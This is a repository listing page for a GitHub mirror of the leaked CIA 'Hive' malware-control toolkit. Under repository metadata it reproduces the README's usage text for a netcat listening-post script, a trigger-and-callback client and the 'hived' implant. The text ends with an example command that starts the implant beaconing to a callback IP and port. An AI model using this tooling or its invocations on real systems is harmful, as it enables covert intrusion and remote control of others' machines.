https://github.com/abougouffa/cia-hive
Hive, a major component of the CIA infrastructure to control its malware.
https://github.com/abougouffa/cia-hive
Last synced: 11 months ago
JSON representation
Hive, a major component of the CIA infrastructure to control its malware.
- Host: GitHub
- URL: https://github.com/abougouffa/cia-hive
- Owner: abougouffa
- License: unlicense
- Created: 2017-12-25T07:46:42.000Z (over 8 years ago)
- Default Branch: master
- Last Pushed: 2017-12-26T13:19:55.000Z (over 8 years ago)
- Last Synced: 2025-04-14T05:38:50.044Z (about 1 year ago)
- Language: C
- Homepage: https://wikileaks.org/vault8/#Hive
- Size: 52.4 MB
- Stars: 17
- Watchers: 2
- Forks: 9
- Open Issues: 0
-
Metadata Files:
- Readme: README
- License: LICENSE
Awesome Lists containing this project
README
//*************************************************************************
nc.sh - scripted netcat listener to emulate listening post until LP is set up
Usage: ./nc.sh
//*************************************************************************
hclient - hive client that works with Windows, Solaris, and Linux implant
Usage:
./hclient-linux-dbg [-p port]
./hclient-linux-dbg [-p port] [-t address] [-a address] [-P protocol] [-d delay]
Depending on options, client can send triggers, listen, or both
[-p port] - callback port
[-t address] - IP address of target
[-a address] - IP address of listener
[-P protocol] - trigger protocol
[-d delay] - (optional) delay between received trigger and callback
[-h ] - print this usage
Examples:
Coming soon!
//*************************************************************************
hived - hive implant
Usage:
./hived-solaris-sparc-dbg -a -p
-a - Beacon IP address to callback to
-p - Beacon port
-I - interface [required, only for Solaris, e.g. hme0, e1000g0]
-d - Initial Beacon delay in milliseconds
-i - Beacon interval in milliseconds
-h - Print help
Example:
./hived-solaris-sparc-dbg -a 10.3.2.76 -p 9999 -i 100000 -I hme0